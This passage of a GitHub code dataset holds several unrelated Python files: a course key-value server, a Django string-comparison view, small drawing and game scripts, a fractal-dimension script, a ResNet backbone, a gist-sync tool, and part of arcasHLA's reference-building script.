只出现一次的数字.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"32350501087","text":"import sys\nimport asyncio\nstorage = {}\nclass ClientServerProtocol(asyncio.Protocol):\n\n def connection_made(self, transport):\n peername = transport.get_extra_info('peername')\n print('Connection from {}'.format(peername))\n self.transport = transport\n\n def data_received(self, data):\n resp = process(data.decode())\n self.transport.write(resp.encode())\n\n\ndef process(data):\n comm, pay = data.split(' ', 1)\n if comm == 'put':\n s = put(pay)\n return s\n elif comm == 'get':\n s = get(pay)\n return s\n else:\n return 'error\\nwrong command\\n\\n'\n\ndef put(data):\n name,value, time = data.split()\n if name not in storage:\n storage[name] = {}\n storage[name].update({time: value})\n\n else:\n storage[name].update({time: value})\n return 'ok\\n\\n'\n\n\ndef get(data):\n\n ky = data.strip()\n if ky == '*':\n response = 'ok\\n'\n for ky, val in storage.items():\n for v in sorted(val):\n response += '%s %s %s\\n' % (ky, val[v], v)\n response += '\\n'\n return response\n else:\n values = storage.get(ky)\n if values:\n response = 'ok\\n'\n for v in sorted(values):\n response += '%s %s %s\\n' % (ky, values[v], v)\n response += '\\n'\n return response\n else:\n return 'ok\\n\\n'\n\n\ndef run_server(host,port):\n loop = asyncio.get_event_loop()\n coro = loop.create_server(ClientServerProtocol,host, port)\n server = loop.run_until_complete(coro)\n try:\n loop.run_forever()\n except KeyboardInterrupt:\n pass\n server.close()\n loop.run_until_complete(server.wait_closed())\n loop.close()\n\nif __name__ == \"__main__\":\n host, port = sys.argv[1:]\n run_server(host, port)\n\n'''\n def data_received(self, data):\n output = \"error\\nwrong command\\n\\n\"\n peername = self.transport.get_extra_info('peername')[1]\n #message = process_data(data.decode())\n message = data.decode()\n print('Data received: {!r}'.format(message))\n rm = message.split(\"\\n\").remove('')\n if isinstance(rm, list):\n for i in message.split(\"\\n\"):\n if i.split()[0]==\"put\":\n print(i)\n output = self.upload_data(peername,i)\n #print(data_base)\n self.transport.write(output.encode())\n if i.split()[0]==\"get\":\n output = self.data_transmitted(peername,i)\n print(output.encode())\n self.transport.write(output.encode())\n else:\n if str(rm).split()[0]==\"put\":\n print(i)\n output = self.upload_data(peername,rm)\n #print(data_base)\n self.transport.write(output.encode())\n if str(rm).split()[0]==\"get\":\n output = self.data_transmitted(peername,rm)\n print(output.encode())\n self.transport.write(output.encode())\n self.transport.write(output.encode())\n'''\n'''\n def upload_data(self,peername,data):\n data = data.split(\"\\n\")\n data = data[4:]\n print(data)\n\n if data_base.get(peername) == None:\n data_base[peername]=[]\n data_base[peername].append(data)\n else:\n data_base[peername].append(data)\n\n data = data[4:]\n print(data)\n return \"ok\\n\\n\"\n'''\n\n'''\n def data_transmitted(self,peername,data):\n #Успешный ответ от сервера:\n #ok\\npalm.cpu 10.5 1501864247\\neardrum.cpu 15.3 1501864259\\n\\n\n output = \"\"\n g = data.split()\n if data_base.get(peername) == None:\n return \"ok\\n\\n\"\n else:\n if g[1] == \"*\":\n for i in data_base[peername]:\n output= output+f'{i}\\n'\n else:\n for i in data_base[peername]:\n if g[1] == i.split()[0]:\n output = output + f'{i}\\n'\n\n print('ok\\n'+output+'\\n')\n return 
'ok\\n'+output+'\\n'\n'''\n","repo_name":"diekaltesonne/Python_course","sub_path":"Погружение_в_Python/WEEK_6/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"4358221366","text":"from django.shortcuts import render\nfrom django.forms.formsets import formset_factory\nfrom django.contrib import messages\n\n# Create your views here.\nfrom testapp.apps.compare.forms import InputForm\n\n\ndef index(request):\n form_string_set = formset_factory(InputForm, extra=4)\n if request.method == 'POST':\n form = form_string_set(request.POST, prefix='String')\n data =[]\n if form.is_valid():\n for form_string in form:\n\n data.append(form_string.get_string())\n\n data = filter(None, data)\n numOfStrings = len(data)\n data.sort(key=len)\n max =[]\n for i in range(numOfStrings-1):\n leastStr = data.pop(0)\n maxSharedStr = ''\n\n while len(leastStr) > len(maxSharedStr):\n robTestStr = leastStr\n while len(robTestStr) > len(maxSharedStr):\n numOfConcidence = 0\n for compatStr in data:\n if robTestStr in compatStr:\n numOfConcidence += 1\n\n if numOfConcidence >= 2 and len(robTestStr) > len(maxSharedStr):\n maxSharedStr = robTestStr\n max.append(robTestStr)\n robTestStr = robTestStr[:-1]\n leastStr = leastStr[1:]\n max.sort(key=len, reverse=True)\n if max:\n return render(request, 'compare/index.html', {'form': form, 'result':max[0]})\n else:\n messages.add_message(request, messages.ERROR, \"No duble\")\n return render(request, 'compare/index.html', {'form': form})\n else:\n messages.add_message(request, messages.ERROR, \"Error.\")\n return render(request, 'compare/index.html', {'form': form})\n else:\n form = form_string_set(prefix='String')\n return render(request, 'compare/index.html', {'form': form})\n\n","repo_name":"yvkalabuha/testapp","sub_path":"testapp/apps/compare/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"1081473108","text":"# 태극 문양 애니메이션 만들기\nimport turtle\n\nt = turtle.Turtle()\nt.reset()\n\ndef draw_shape(radius, color1):\n t.left(270)\n t.width(3)\n t.color(\"black\", color1)\n t.begin_fill()\n t.circle(radius/2.0, -180)\n t.circle(radius, -180)\n t.left(180)\n t.circle(-radius/2.0, -180)\n t.end_fill()\n\ndraw_shape(200, \"red\")\nt.setheading(180)\ndraw_shape(200, \"blue\")","repo_name":"wnsgur1198/python_practice","sub_path":"ex4.py","file_name":"ex4.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"1746615886","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport math\nfrom scipy.optimize import lsq_linear\nlattice=open(\"lattice.txt\",\"w\")\nsqn=70\nwhile(sqn<=300):\n\tnodes=sqn**2\n\tlbmax=2*(sqn-1)+1\n\tcil=np.zeros([nodes,lbmax])\n\tused=[0]*nodes\n\tfor lb in range (0,lbmax):\n for i in range (1,nodes):\n used=[0]*nodes\n for j in range(0,i):\n if abs(i-j)/sqn+abs(i-j)%sqn>lb:\n used[int(cil[j][lb])]=1\n for col in range(0,nodes):\n if used[col]==0:\n cil[i][lb]=col\n break \n\t#Number of boxes required\n\tnb=np.amax(cil,0)+1\n\ty=np.transpose([math.log(i) for i in nb])\n\tlboxes=range(1,lbmax+1)\n\tllboxes=[-math.log(i) for i in lboxes]\n\tA=np.column_stack(([1]*lbmax, llboxes))\n\t#print(A)\n\tlsq=lsq_linear(A,y)\n\tk=np.exp(lsq.x[0])\n\ttfd=lsq.x[1]\n\tfitted=[k*(1.0/lbox)**tfd for lbox in 
lboxes]\n\tlattice.write(str(sqn)+\" \"+str(tfd)+\"\\n\")\n\tprint(sqn, tfd)\n\tsqn+=10\n\n#plt.figure(1)\n#plt.loglog(lboxes,nb,'.')\n#plt.loglog(lboxes,fitted,'-')\n\n","repo_name":"giorkala/Protein-Protein-Interaction-Networks-Project","sub_path":"2.TFD_Calculation/lattice2.py","file_name":"lattice2.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"72503270919","text":"from argparse import ArgumentParser, Namespace\nimport torch\nimport torch.nn as nn\n\nfrom datasets import ContinualDatasetInfo\nfrom compressors import CompressorDecompressorInfo\nfrom backbones.layers import ConvBlock, FinalBlock\n\n\n\ndef add_backbone_args(parser: ArgumentParser):\n parser.add_argument('--backbone_block', type=float, default=0, required=False, help='after which block to cut the resnet. Use 0 to use the whole resnet')\n\n\nclass BasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, opt, inChannels, outChannels, stride=1, downsample=None):\n \"\"\"Building Block of resnet consisting of two conv-layers and a shortcut\"\"\"\n super().__init__()\n self.downsample = downsample\n expansion = 1\n self.conv1 = ConvBlock(opt=opt, in_channels=inChannels, out_channels=outChannels, kernel_size=3, stride=stride, padding=1, bias=False)\n self.conv2 = ConvBlock(opt=opt, in_channels=outChannels, out_channels=outChannels*expansion, kernel_size=3, stride=1, padding=1, bias=False)\n\n def forward(self, x):\n _out = self.conv1(x)\n _out = self.conv2(_out)\n if self.downsample is not None:\n shortcut = self.downsample(x)\n else:\n shortcut = x\n _out = _out + shortcut\n return _out\n\nclass ResidualBlock(nn.Module):\n def __init__(self, opt, block, inChannels, outChannels, depth, stride=1):\n super().__init__()\n if stride != 1 or inChannels != outChannels * block.expansion:\n downsample = ConvBlock(opt=opt, in_channels=inChannels, out_channels=outChannels* block.expansion, kernel_size=1, stride=stride, padding=0, bias=False)\n else:\n downsample = None\n self.blocks = nn.Sequential()\n self.blocks.add_module('block0', block(opt, inChannels, outChannels, stride, downsample))\n inChannels = outChannels * block.expansion\n for i in range(1, depth):\n self.blocks.add_module('block{}'.format(i), block(opt, inChannels, outChannels))\n\n def forward(self, x):\n return self.blocks(x)\n\nclass PartialResidualBlock(nn.Module):\n def __init__(self, opt, block, inChannels, outChannels, depth, stride=1):\n assert depth==2\n super().__init__()\n self.blocks = nn.Sequential()\n inChannels = outChannels * block.expansion\n for i in range(1, depth):\n self.blocks.add_module('block{}'.format(i), block(opt, inChannels, outChannels))\n\n def forward(self, x):\n return self.blocks(x)\n\n\n\nclass Resnet(nn.Module):\n def __init__(self, opt: Namespace, dataset_info: ContinualDatasetInfo, compressor_info: CompressorDecompressorInfo):\n \"\"\"resnet 18. 
It is possible to cut off layers from the front."""\n super().__init__()\n self.cut_layer = opt.backbone_block\n num_blocks = [2, 2, 2, 2]\n block = BasicBlock\n in_planes, out_planes = 64, 512 #20, 160\n\n self.num_classes = dataset_info.num_classes\n initial = ConvBlock(opt=opt, in_channels=compressor_info.out_channels, out_channels=in_planes, kernel_size=3, stride=1, padding=1)\n group1 = ResidualBlock(opt=opt, block=block, inChannels=64, outChannels=64, depth=num_blocks[0], stride=1) #For ResNet-S, convert this to 20,20\n group2 = ResidualBlock(opt=opt, block=block, inChannels=64*block.expansion, outChannels=128, depth=num_blocks[1], stride=2) #For ResNet-S, convert this to 20,40\n group3 = ResidualBlock(opt=opt, block=block, inChannels=128*block.expansion, outChannels=256, depth=num_blocks[2], stride=2) #For ResNet-S, convert this to 40,80\n group3_partial = PartialResidualBlock(opt=opt, block=block, inChannels=128*block.expansion, outChannels=256, depth=num_blocks[2], stride=2) #For ResNet-S, convert this to 40,80\n group4 = ResidualBlock(opt=opt, block=block, inChannels=256*block.expansion, outChannels=512, depth=num_blocks[3], stride=2) #For ResNet-S, convert this to 80,160\n group4_partial = PartialResidualBlock(opt=opt, block=block, inChannels=256*block.expansion, outChannels=512, depth=num_blocks[3], stride=2) #For ResNet-S, convert this to 80,160\n self.pool = nn.AdaptiveAvgPool2d(1)\n self.final = FinalBlock(num_classes=dataset_info.num_classes, opt=opt, in_channels=out_planes*block.expansion)\n\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n if self.cut_layer == 0:\n self.blocks = nn.Sequential(\n initial,\n group1,\n group2,\n group3,\n group4\n )\n elif self.cut_layer == 1:\n self.blocks = nn.Sequential(\n group2,\n group3,\n group4\n )\n elif self.cut_layer == 2:\n self.blocks = nn.Sequential(\n group3,\n group4\n )\n elif self.cut_layer == 2.5:\n self.blocks = nn.Sequential(\n group3_partial,\n group4\n )\n elif self.cut_layer == 3:\n self.blocks = nn.Sequential(\n group4\n )\n elif self.cut_layer == 3.5:\n self.blocks = nn.Sequential(\n group4_partial\n )\n else:\n raise ValueError(f'--backbone_block must be 0, 1, 2, 2.5, 3 or 3.5. 
Got {self.cut_layer}')\n\n\n def forward(self, x):\n out = self.blocks(x)\n \n out = self.pool(out)\n out = out.view(x.size(0), -1)\n out = self.final(out)\n return out","repo_name":"TUC-ProAut/fetch","sub_path":"src/backbones/resnet.py","file_name":"resnet.py","file_ext":"py","file_size_in_byte":5800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"31655908194","text":"from typing import *\nfrom enum import IntEnum, auto\nimport os\nimport pathlib\nimport logging\n\nfrom typeguard import typechecked\n\nfrom .errors import LocalFileRemovedError, ConflictError, RemoteFileRemovedError\nfrom .abc import IRemoteProvider\nfrom .configs import GLinkConfigs\nfrom .provs.gist import GistProvider\nfrom .utils import sha1_bytes\n\n\nclass SyncWays(IntEnum):\n pull = 1\n push = 2\n twoway = 3\n\n def __str__(self) -> str:\n return self.name\n\n def __format__(self, format_spec: str) -> str:\n return self.name\n\n def to_symbol(self) -> str:\n if self == SyncWays.twoway:\n return '<->'\n elif self == SyncWays.pull:\n return ' ->'\n else:\n return '<- '\n\n\nclass ConflictPolicies(IntEnum):\n unset = auto()\n local = auto()\n remote = auto()\n skip = auto()\n\n def __str__(self) -> str:\n return self.name\n\n def __format__(self, format_spec: str) -> str:\n return self.name\n\ndef _get_providers() -> Dict[str, IRemoteProvider]:\n return dict((x.name, x) for x in [GistProvider()])\n\nclass GLinkApi:\n def __init__(self, conf_root: str=None) -> None:\n self._configs = GLinkConfigs(\n pathlib.Path(conf_root) if conf_root else None\n )\n self._logger = logging.getLogger('glink')\n\n def get_links(self):\n return dict(\n (link_id, self._configs.get_link(link_id=link_id)) for link_id in self._configs.get_all_link_ids()\n )\n\n def get_all_link_ids(self):\n return self._configs.get_all_link_ids()\n\n def remove_link(self, link_id: str):\n self._configs.remove_link(link_id=link_id)\n\n def add_link(self, url: str, local_file: Optional[str], way: SyncWays):\n parsed = [(p, p.parse_url(url)) for p in _get_providers().values()]\n parsed = [(p, r) for p, r in parsed if r]\n\n if not parsed:\n self._logger.error(f'url \"{url}\" does not match any pattern.')\n return\n\n if len(parsed) > 1:\n self._logger.warning(f'url \"{url}\" matched multi patterns:')\n for _, r in parsed:\n self._logger.info(f' - {r.s()}')\n return\n\n prov, rfi = parsed[0]\n\n remote_file = rfi.remote_file\n assert remote_file\n\n if not local_file:\n local_file = os.path.basename(remote_file)\n local_file = os.path.abspath(local_file)\n\n link_id: str = self._configs.add_link(\n prov=prov.name,\n user=rfi.user,\n repo=rfi.repo,\n remote_file=remote_file,\n local_file=local_file,\n way=way.value\n )\n\n self._logger.info(f'link added: {rfi.s()} {way.to_symbol()} {local_file}')\n return link_id\n\n def push_new_gist(self, local_file: str, user: Optional[str], public: bool):\n prov = 'gist'\n\n auth_info = self._configs.read_auth_info(prov, user, allow_default=True)\n if isinstance(auth_info, str):\n access_token = auth_info\n else:\n access_token = None\n\n provider = GistProvider()\n remote_file = os.path.basename(local_file)\n repo = provider.new_gist(\n user=user,\n filename=remote_file,\n content=pathlib.Path(local_file).read_bytes(),\n access_token=access_token,\n public=public\n )\n\n link_id: str = self._configs.add_link(\n prov=prov,\n user=user,\n repo=repo,\n remote_file=remote_file,\n local_file=os.path.abspath(local_file),\n way=SyncWays.twoway.value\n )\n\n 
self._logger.info(f'link added: gist/{repo}/{remote_file} {SyncWays.twoway.to_symbol()} {local_file}')\n return link_id\n\n @typechecked\n def _sync_one_core(self,\n prov: str, user: str, repo: str, remote_file: str, local_file: str, way: int, sync_state: dict,\n conflict_policy: ConflictPolicies\n ):\n assert way in SyncWays.__members__.values()\n\n provider: IRemoteProvider\n if prov == 'gist':\n provider = GistProvider()\n else:\n raise NotImplementedError\n remote_name = f'{prov}(\"{repo}\")'\n local_name = f'local(\"{local_file}\")'\n\n kwargs = dict(prov=prov, user=user, repo=repo, remote_file=remote_file)\n auth_info = self._configs.read_auth_info(prov, user)\n if isinstance(auth_info, str):\n kwargs['access_token'] = auth_info\n kwargs.setdefault('access_token', None)\n\n remote_version = provider.get_remote_version(**kwargs)\n self._logger.debug(f'current remote version is: {remote_version}.')\n if remote_version != sync_state.get('remote_version'):\n remote_file_content = provider.get_remote_file_content(**kwargs, version=remote_version)\n if remote_file_content is not None:\n remote_file_sha1 = sha1_bytes(remote_file_content)\n elif not sync_state:\n # new link for push\n remote_file_sha1 = None\n else:\n raise RemoteFileRemovedError(f'remote file {remote_file!r} is removed')\n remote_file_changed = remote_file_sha1 != sync_state.get('file_sha1')\n else:\n remote_file_sha1 = None\n remote_file_content = None\n remote_file_changed = False\n\n local_file_pathobj = pathlib.Path(local_file)\n if os.path.isfile(local_file):\n local_file_content = local_file_pathobj.read_bytes()\n local_file_sha1 = sha1_bytes(local_file_content)\n local_file_changed = local_file_sha1 != sync_state.get('file_sha1')\n elif sync_state:\n raise LocalFileRemovedError(f'local file {local_file!r} is removed')\n else:\n local_file_content = None\n local_file_sha1 = None\n local_file_changed = False\n\n file_sha1 = None\n pull, push = False, False\n if remote_file_changed and local_file_changed:\n self._logger.debug(f'both versions is changed.')\n if remote_file_sha1 == local_file_sha1:\n self._logger.info(f'reattach local file \"{local_file}\" as unchanged.')\n file_sha1 = remote_file_sha1\n else:\n if conflict_policy == ConflictPolicies.unset:\n raise ConflictError(f'{local_name} and {remote_name} both changed.')\n elif conflict_policy == ConflictPolicies.local:\n if way == SyncWays.pull:\n self._logger.warning('ignore by pull only.')\n return\n push = True\n else:\n if way == SyncWays.push:\n self._logger.warning('ignore by push only.')\n return\n pull = True\n elif remote_file_changed:\n self._logger.debug(f'remote version is changed.')\n if way == SyncWays.push:\n self._logger.debug('ignore by push only.')\n return\n pull = True\n\n elif local_file_changed:\n self._logger.debug(f'local version is changed.')\n if way == SyncWays.pull:\n self._logger.debug('ignore by pull only.')\n return\n push = True\n\n else:\n self._logger.debug(f'both versions is not changed.')\n return\n\n assert not (pull and push)\n if pull:\n local_file_pathobj.write_bytes(remote_file_content)\n file_sha1 = remote_file_sha1\n self._logger.info(f'pull {remote_name} to {local_name}.')\n elif push:\n remote_version = provider.push_local_file_content(local_file_content=local_file_content, **kwargs)\n file_sha1 = local_file_sha1\n self._logger.info(f'push {local_name} to {remote_name}.')\n\n assert remote_version\n assert file_sha1\n sync_state.update(\n remote_version=remote_version,\n file_sha1=file_sha1\n )\n return True\n\n def 
sync_one(self, link_id: str, conflict_policy: ConflictPolicies=ConflictPolicies.unset):\n link_data: dict = self._configs.get_link(link_id=link_id)\n if not link_data:\n self._logger.warning(f'no such link: {link_id}')\n return\n sync_state = link_data.setdefault('sync_state', {})\n synced = False\n try:\n synced = self._sync_one_core(conflict_policy=conflict_policy, **link_data)\n except (LocalFileRemovedError, RemoteFileRemovedError) as e:\n self._logger.warning(f'skipped link(\"{link_id}\") because {e.message}.')\n if synced:\n self._configs.save_state(link_id=link_id, sync_state=sync_state)\n","repo_name":"Cologler/glink-python","sub_path":"glink/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":8823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"37057315141","text":"import random\n\nrock = '''\n _______\n---' ____)\n (_____)\n (_____)\n (____)\n---.__(___)\n'''\n\npaper = '''\n _______\n---' ____)____\n ______)\n _______)\n _______)\n---.__________)\n'''\n\nscissors = '''\n _______\n---' ____)____\n ______)\n __________)\n (____)\n---.__(___)\n'''\n\nchoice = int(input(\"What do you choose? Type 0 for Rock, 1 for Paper or 2 for Scissors.\\n\"))\ncomputer = random.randint(0, 2)\ngame_images = [rock, paper, scissors]\nif choice >= 3 or choice < 0:\n print(\"You typed an invalid number\")\nelse:\n print(game_images[choice])\n \n if computer == 0:\n print(f\"Computer chose:\\n {rock}\")\n elif computer == 1:\n print(f\"Computer chose:\\n {paper}\")\n else: \n print(f\"Computer chose:\\n {scissors}\")\n \n if choice == computer:\n print(\"It's a draw\")\n elif choice == 0 and computer == 1:\n print(\"You lose\")\n elif choice == 0 and computer == 2:\n print(\"You win\")\n elif choice == 1 and computer == 2:\n print(\"You lose\")\n elif choice == 1 and computer == 0:\n print(\"You win\")\n elif choice == 2 and computer == 0:\n print(\"You lose\")\n elif choice == 2 and computer == 1:\n print(\"You win\")\n \n\n","repo_name":"Maxsimilian/Python-Bootcamp","sub_path":"Rock-Paper-Scissors Game/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"39957686665","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n#-------------------------------------------------------------------------------\n# customize.py: genotypes from extracted chromosome 6 reads.\n#-------------------------------------------------------------------------------\n\n#-------------------------------------------------------------------------------\n# This file is part of arcasHLA.\n#\n# arcasHLA is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# arcasHLA is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with arcasHLA. 
If not, see <http://www.gnu.org/licenses/>.\n#-------------------------------------------------------------------------------\n\nimport os\nimport sys\nimport re\nimport json\nimport pickle\nimport argparse\nimport logging as log\n\nimport numpy as np\nimport math\nimport pandas as pd\n\nfrom datetime import date\nfrom argparse import RawTextHelpFormatter\nfrom textwrap import wrap\nfrom collections import Counter, defaultdict\nfrom itertools import combinations\n\nfrom Bio.Alphabet import generic_dna\nfrom Bio.Seq import Seq\nfrom Bio.SeqRecord import SeqRecord\nfrom Bio.Align import MultipleSeqAlignment\nfrom Bio import SeqIO\n\nfrom reference import check_ref\nfrom arcas_utilities import *\n\n#-------------------------------------------------------------------------------\n\n__version__ = '0.4.0'\n__date__ = '2022-01-27'\n\n#-------------------------------------------------------------------------------\n# Paths and filenames\n#-------------------------------------------------------------------------------\n\nrootDir = os.path.dirname(os.path.realpath(__file__)) + '/../'\nallele_groups_json = rootDir + 'dat/ref/allele_groups.json'\ncDNA_json = rootDir + 'dat/ref/cDNA.json'\ncDNA_single_json = rootDir + 'dat/ref/cDNA.single.json'\nGRCh38_chr6 = rootDir + 'dat/ref/GRCh38.chr6.noHLA.fasta'\nGRCh38 = rootDir + 'dat/ref/GRCh38.all.noHLA.fasta'\nHLA_json = rootDir + 'dat/ref/hla_transcripts.json'\ndummy_HLA_fa = rootDir + 'dat/ref/GRCh38.chr6.HLA.fasta'\nparameters_json = rootDir + 'dat/info/parameters.json'\n\n#-------------------------------------------------------------------------------\n\ndef build_custom_reference(subject, genotype, grouping, transcriptome_type, temp):\n \n dummy_HLA_dict = SeqIO.to_dict(SeqIO.parse(dummy_HLA_fa, 'fasta')) \n \n if transcriptome_type == 'none':\n transcriptome = []\n elif transcriptome_type == 'chr6':\n transcriptome = list(SeqIO.parse(GRCh38_chr6, 'fasta'))\n else:\n transcriptome = list(SeqIO.parse(GRCh38, 'fasta'))\n \n with open(HLA_json,'r') as file:\n HLA_transcripts = json.load(file)\n \n genes = {allele_id[:-1] for allele_id in genotype.keys()}\n for gene in set(HLA_transcripts) - genes:\n for transcript in HLA_transcripts[gene]:\n transcriptome.append(dummy_HLA_dict[transcript])\n \n #with open(allele_groups_p,'rb') as file:\n # groups = pickle.load(file)\n with open(allele_groups_json,'r') as file:\n groups_temp = json.load(file)\n groups = defaultdict(list)\n for k,v in groups_temp.items():\n groups[k] = set(v)\n\n #with open(cDNA_p,'rb') as file:\n # cDNA = pickle.load(file)\n with open(cDNA_json,'r') as file:\n cDNA_temp = json.load(file)\n cDNA = defaultdict(list)\n for k,v in cDNA_temp.items():\n cDNA[k] = set(v)\n\n #with open(cDNA_single_p,'rb') as file:\n # cDNA_single = pickle.load(file)\n with open(cDNA_single_json,'r') as file:\n cDNA_single = json.load(file)\n \n indv_fasta = ''.join([temp,subject,'.fasta'])\n indv_idx = ''.join([outdir,subject,'.idx'])\n indv_p = ''.join([outdir,subject,'.p'])\n\n indv_records = []\n\n allele_idx = dict()\n lengths = dict()\n genes = defaultdict(list)\n hla_idx = defaultdict(list)\n\n idx = 0\n for allele_id, allele in genotype.items():\n gene = get_gene(allele)\n \n if grouping == 'single':\n sequences = [cDNA_single[allele]]\n elif grouping == 'g-group':\n sequences = [seq for a in groups[allele] for seq in cDNA[a]]\n else:\n sequences = [seq for seq in cDNA[allele]]\n \n for seq in sequences:\n hla_idx[allele_id].append(str(idx))\n genes[gene].append(allele_id)\n
allele_idx[str(idx)] = allele_id\n lengths[str(idx)] = len(seq)\n\n record = SeqRecord(Seq(seq),\n id=str(idx),\n description='')\n\n indv_records.append(record)\n idx += 1\n \n for transcript in transcriptome:\n allele_idx[str(idx)] = transcript.id\n lengths[str(idx)] = len(transcript.seq)\n\n record = SeqRecord(transcript.seq,\n id=str(idx),\n description='')\n\n indv_records.append(record)\n idx += 1\n\n SeqIO.write(indv_records, indv_fasta, 'fasta')\n\n with open(indv_p, 'wb') as file:\n pickle.dump([genes,genotype,hla_idx,allele_idx,lengths], file)\n \n\n output = run_command(['kallisto', 'index','-i', indv_idx, indv_fasta])\n print(output.stderr.decode())\n\ndef process_json_genotype(input_genotype, genes):\n genotype = dict()\n for gene, alleles in input_genotype.items():\n if genes and gene not in genes:\n continue\n \n alleles = [process_allele(allele,2) for allele in alleles]\n if len(alleles) == 2:\n genotype[gene + '1'], genotype[gene + '2'] = alleles\n else:\n genotype[gene + '1'] = genotype[gene + '2'] = alleles[0]\n return genotype\n\ndef process_str_genotype(input_genotype, genes):\n genotype = dict()\n for allele in input_genotype.split(','):\n gene = get_gene(allele)\n if genes and gene not in genes:\n continue\n \n if gene + '1' not in genotype:\n genotype[gene + '1'] = process_allele(allele,2)\n elif gene + '2' not in genotype:\n genotype[gene + '2'] = process_allele(allele,2)\n else:\n sys.exit('[quant] Error: more than 2 alleles provided for a gene.')\n run_command(['rm -rf', temp])\n \n return genotype\n \n \nif __name__ == '__main__':\n \n #with open(parameters, 'rb') as file:\n # genes, populations, databases = pickle.load(file)\n with open(parameters_json, 'r') as file:\n genes, populations, _ = json.load(file)\n genes = set(genes)\n populations = set(populations)\n \n parser = argparse.ArgumentParser(prog='arcasHLA customize',\n usage='%(prog)s [options]',\n add_help=False,\n formatter_class=RawTextHelpFormatter)\n \n parser.add_argument('-h',\n '--help', \n action = 'help',\n help = 'show this help message and exit\\n\\n',\n default = argparse.SUPPRESS)\n \n parser.add_argument('-G',\n '--genotype',\n help='comma-separated list of HLA alleles (e.g. A*01:01,A*11:01,...)\\narcasHLA output genotype.json or genotypes.json \\nor tsv with format specified in README.md',\n metavar='',\n type=str)\n \n parser.add_argument('-s',\n '--subject',\n help='subject name, only required for list of alleles',\n default = '',\n metavar='',\n type=str)\n \n parser.add_argument('-g',\n '--genes',\n help='comma separated list of HLA genes\\n'+\n 'default: all\\n' + '\\n'.join(wrap('options: ' +\n ', '.join(sorted(genes)), 60)) +'\\n\\n',\n default='', \n metavar='',\n type=str)\n\n parser.add_argument('--transcriptome', \n type = str,\n help = 'transcripts to include besides input HLAs\\n options: full, chr6, none\\n default: full\\n\\n',\n default='full')\n\n parser.add_argument('--resolution', \n type = int,\n help='genotype resolution, only use >2 when typing performed with assay or Sanger sequencing\\n default: 2\\n\\n',\n default=2)\n \n parser.add_argument('--grouping',\n type = str,\n help = 'type/number of transcripts to include per allele\\n single - one 3-field resolution transcript per allele (e.g. 
A*01:01:01)\\ng-group - all transcripts with identical binding regions \\n default: protein group - all transcripts with identical protein types (2 fields the same)\\n\\n',\n default='protein-group')\n \n parser.add_argument('-o',\n '--outdir',\n type = str,\n help = 'out directory\\n\\n',\n default = './', \n metavar = '')\n \n parser.add_argument('--temp', \n type = str,\n help = 'temp directory\\n\\n',\n default = '/tmp/', \n metavar = '')\n \n parser.add_argument('--keep_files',\n action = 'count',\n help = 'keep intermediate files\\n\\n',\n default = False)\n \n parser.add_argument('-t',\n '--threads', \n type = str,\n default = '1',\n metavar = '')\n \n\n parser.add_argument('-v',\n '--verbose', \n action = 'count',\n default = False)\n\n args = parser.parse_args()\n \n if args.resolution != 2:\n sys.exit('[customize] only 2-field resolution supported at this time.')\n \n outdir = check_path(args.outdir)\n temp = args.temp\n \n if len(args.genes) > 0:\n genes = set(args.genes.split(','))\n else:\n genes = None\n \n \n if args.genotype.endswith('genotype.json'):\n if args.subject:\n subject = args.subject\n else:\n subject = os.path.basename(args.genotype).split('.')[0]\n\n if args.verbose: print('[customize] Building reference for', subject)\n \n with open(args.genotype, 'r') as file:\n input_genotype = json.load(file)\n \n genotype = process_json_genotype(input_genotype, genes)\n print(genes)\n print(genotype)\n \n build_custom_reference(subject, genotype, args.grouping, args.transcriptome, temp)\n \n elif args.genotype.endswith('.genotypes.json') or args.genotype.endswith('.tsv'):\n temp = create_temp(temp)\n \n if args.verbose: print('[customize] Building references from',os.path.basename(args.genotype))\n \n genotypes = dict()\n if args.genotype.endswith('genotypes.json'):\n with open(args.genotype, 'r') as file:\n input_genotypes = json.load(file)\n for subject, genotype in input_genotypes.items():\n genotype = ','.join(process_json_genotype(genotype, genes).values())\n genotypes[subject] = genotype\n \n else:\n genotypes = pd.read_csv(args.genotype, sep='\\t').set_index('subject').to_dict('index')\n for subject, genotype in genotypes.items():\n if genes:\n genotypes[subject] = ','.join({allele for allele_id, allele in genotypes[subject].items() if allele[:-1] in genes})\n else:\n genotypes[subject] = ','.join(genotype.values())\n subject_file = temp + 'subjects.txt'\n with open(subject_file,'w') as file:\n file.write('\\n'.join([subject + '/' + genotype for subject, genotype in genotypes.items()]))\n command = ['cat', subject_file, '|','parallel', '-j', args.threads,\n 